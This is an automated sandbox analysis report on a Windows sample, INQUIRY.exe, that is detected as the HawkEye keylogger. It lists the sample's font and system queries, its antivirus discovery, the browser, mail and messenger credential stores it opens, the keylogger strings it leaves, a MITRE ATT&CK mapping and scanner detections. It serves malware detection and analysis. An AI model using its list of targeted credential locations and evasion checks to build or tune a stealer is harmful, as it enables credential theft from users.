                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0040697A GetSystemTime,0_2_0040697A
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 5_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,5_2_0040724C
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00441B28 GetVersion,0_2_00441B28
                    Source: C:\Users\user\Desktop\INQUIRY.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: INQUIRY.exe, 00000011.00000002.835872619.000000000019D000.00000004.00000010.sdmp Binary or memory string: avp.exe
                    Source: INQUIRY.exe, 00000010.00000002.825678890.00000000008CC000.00000004.00000020.sdmp Binary or memory string: r\MsMpeng.exe
                    Source: INQUIRY.exe, 00000010.00000002.825678890.00000000008CC000.00000004.00000020.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information:

                    Yara detected HawkEye Keylogger
                    Yara detected MailPassView
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Tries to steal Instant Messenger accounts or passwords
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                    Tries to steal Mail credentials (via file access)
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Tries to steal Mail credentials (via file registry)
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword 5_2_00402D9A
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword 5_2_00402D9A
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: ESMTPPassword 5_2_004033D7
                    Yara detected WebBrowserPassView password recovery toolShow sources

                    Remote Access Functionality:

                    Detected HawkEye Rat
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe String found in binary or memory: HawkEye_Keylogger_Stealer_Records_
                    Source: INQUIRY.exe String found in binary or memory: HawkEyeKeylogger
                    Source: INQUIRY.exe String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe String found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp String found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp String found in binary or memory: q#"HawkEye_Keylogger_Stealer_Records_
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp String found in binary or memory: HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp String found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp String found in binary or memory: q#"HawkEye_Keylogger_Stealer_Records_
                    Yara detected HawkEye Keylogger

                    Mitre Att&ck Matrix

                    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                    Replication Through Removable Media 1 | Windows Management Instrumentation 21 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 1 | OS Credential Dumping 1 | System Time Discovery 1 | Replication Through Removable Media 1 | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                    Default Accounts | Native API 11 | Application Shimming 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 11 | Input Capture 211 | Peripheral Device Discovery 1 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Encrypted Channel 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                    Domain Accounts | Shared Modules 1 | Logon Script (Windows) | Process Injection 511 | Obfuscated Files or Information 21 | Credentials in Registry 2 | Account Discovery 1 | SMB/Windows Admin Shares | Screen Capture 1 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing 41 | Credentials In Files 1 | File and Directory Discovery 1 | Distributed Component Object Model | Email Collection 1 | Scheduled Transfer | Remote Access Software 1 | SIM Card Swap | | Carrier Billing Fraud
                    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading 1 | LSA Secrets | System Information Discovery 39 | SSH | Input Capture 211 | Data Transfer Size Limits | Non-Application Layer Protocol 2 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 1 | Cached Domain Credentials | Query Registry 1 | VNC | Clipboard Data 3 | Exfiltration Over C2 Channel | Application Layer Protocol 13 | Jamming or Denial of Service | | Abuse Accessibility Features
                    External Remote Services | Scheduled Task | Startup Items | Startup Items | Modify Registry 1 | DCSync | Security Software Discovery 1101 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 6 | Proc Filesystem | Virtualization/Sandbox Evasion 6 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                    Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 511 | /etc/passwd and /etc/shadow | Process Discovery 3 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                    Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Hidden Files and Directories 1 | Network Sniffing | Application Window Discovery 11 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
                    Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | System Owner/User Discovery 1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop
                    Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | Remote System Discovery 1 | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery
                    Compromise Hardware Supply Chain | Visual Basic | Scheduled Task | Scheduled Task | Masquerade Task or Service | GUI Input Capture | System Network Configuration Discovery 1 | Exploitation of Remote Services | Email Collection | Commonly Used Port | Proxy | | | Defacement

                    Behavior Graph

                    [Behavior graph: ID 319686, Sample: INQUIRY.exe, Startdate: 18/11/2020, Architecture: WINDOWS, Score: 100]

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    Source | Detection | Scanner | Label
                    INQUIRY.exe | 44% | Virustotal | -
                    INQUIRY.exe | 42% | ReversingLabs | Win32.Trojan.Wacatac
                    INQUIRY.exe | 100% | Joe Sandbox ML | -

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    Source | Detection | Scanner | Label
                    0.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
                    16.2.INQUIRY.exe.22e0000.1.unpack | 100% | Avira | TR/Inject.vcoldi
                    32.2.INQUIRY.exe.2680000.3.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    32.2.INQUIRY.exe.2680000.3.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    16.1.INQUIRY.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    1.2.INQUIRY.exe.21e0000.1.unpack | 100% | Avira | TR/Inject.vcoldi
                    33.1.INQUIRY.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    1.2.INQUIRY.exe.2270000.2.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    1.2.INQUIRY.exe.2270000.2.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    29.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
                    13.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
                    28.1.INQUIRY.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    16.2.INQUIRY.exe.2370000.2.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    16.2.INQUIRY.exe.2370000.2.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    0.2.INQUIRY.exe.2640000.3.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    0.2.INQUIRY.exe.2640000.3.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    27.2.INQUIRY.exe.2640000.3.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    27.2.INQUIRY.exe.2640000.3.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    33.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    33.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    1.1.INQUIRY.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    34.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
                    17.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
                    37.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1125438
                    6.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1125438
                    0.2.INQUIRY.exe.25f0000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
                    28.2.INQUIRY.exe.22f0000.3.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    28.2.INQUIRY.exe.22f0000.3.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    33.2.INQUIRY.exe.22f0000.2.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    33.2.INQUIRY.exe.22f0000.2.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    27.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
                    1.2.INQUIRY.exe.2300000.3.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    1.2.INQUIRY.exe.2300000.3.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    16.2.INQUIRY.exe.2490000.3.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    16.2.INQUIRY.exe.2490000.3.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    33.2.INQUIRY.exe.2210000.1.unpack | 100% | Avira | TR/Inject.vcoldi
                    28.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    28.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    13.2.INQUIRY.exe.2660000.3.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    13.2.INQUIRY.exe.2660000.3.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    33.2.INQUIRY.exe.2380000.3.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    33.2.INQUIRY.exe.2380000.3.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    20.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1125438
                    2.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
                    32.2.INQUIRY.exe.2630000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
                    28.2.INQUIRY.exe.7a0000.1.unpack | 100% | Avira | TR/Inject.vcoldi
                    16.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    16.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
